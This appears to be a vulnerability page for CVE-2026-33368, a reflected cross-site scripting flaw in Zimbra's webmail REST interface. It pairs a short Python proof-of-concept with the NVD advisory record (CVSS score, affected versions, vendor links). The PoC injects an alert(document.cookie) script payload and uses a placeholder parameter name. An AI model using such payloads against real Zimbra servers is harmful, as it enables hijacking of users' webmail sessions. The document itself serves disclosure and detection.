CVE-2026-33368

import requests # PoC for CVE-2026-33368: Reflected XSS in Zimbra Collaboration Suite # Target Endpoint: /h/rest target_url = "http://<target-ip>/h/rest" xss_payload = "<script>alert(document.cookie)</script>" # The vulnerability lies in improper sanitization of parameters passed to the REST interface. # An attacker crafts a URL that includes the payload in a vulnerable parameter. params = { "vulnerable_param": xss_payload } try: response = requests.get(target_url, params=params, verify=False) if xss_payload in response.text: print("[+] Vulnerability Confirmed! Payload is reflected in the response.") print(f"[+] Exploit URL: {response.url}") else: print("[-] Payload not reflected. Verify affected version and endpoint.") except Exception as e: print(f"Error: {e}")

{"cve": {"id": "CVE-2026-33368", "sourceIdentifier": "[email protected]", "published": "2026-03-20T14:16:15.810", "lastModified": "2026-04-01T15:37:25.367", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Zimbra Collaboration Suite (ZCS) 10.0 and 10.1 contains a reflected cross-site scripting (XSS) vulnerability in the Classic Webmail REST interface (/h/rest). The application fails to properly sanitize user-supplied input, allowing an unauthenticated attacker to inject malicious JavaScript into a crafted URL. When a victim user accesses the link, the injected script executes in the context of the Zimbra webmail application, which could allow the attacker to perform actions on behalf of the victim."}, {"lang": "es", "value": "Zimbra Collaboration Suite (ZCS) 10.0 y 10.1 contiene una vulnerabilidad de cross-site scripting (XSS) reflejada en la interfaz REST de Classic Webmail (/h/rest). La aplicación no logra sanear correctamente la entrada proporcionada por el usuario, permitiendo a un atacante no autenticado inyectar JavaScript malicioso en una URL manipulada. Cuando un usuario víctima accede al enlace, el script inyectado se ejecuta en el contexto de la aplicación de webmail de Zimbra, lo que podría permitir al atacante realizar acciones en nombre de la víctima."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.0.0", "versionEndExcluding": "10.1.16", "matchCriteriaId": "E8DBE536-EAB0-48FF-A195-C0DB0A7FBCA0"}]}]}], "references": [{"url": "https://wiki.zimbra.com/wiki/Security_Center", "source": "[email protected]", "tags": ["Vendor Advisory", "Release Notes"]}, {"url": "https://wiki.zimbra.com/wiki/Zimbra_Releases/10.1.16#Security_Fixes", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://wiki.zimbra.com/wiki/Zimbra_Responsible_Disclosure_Policy", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}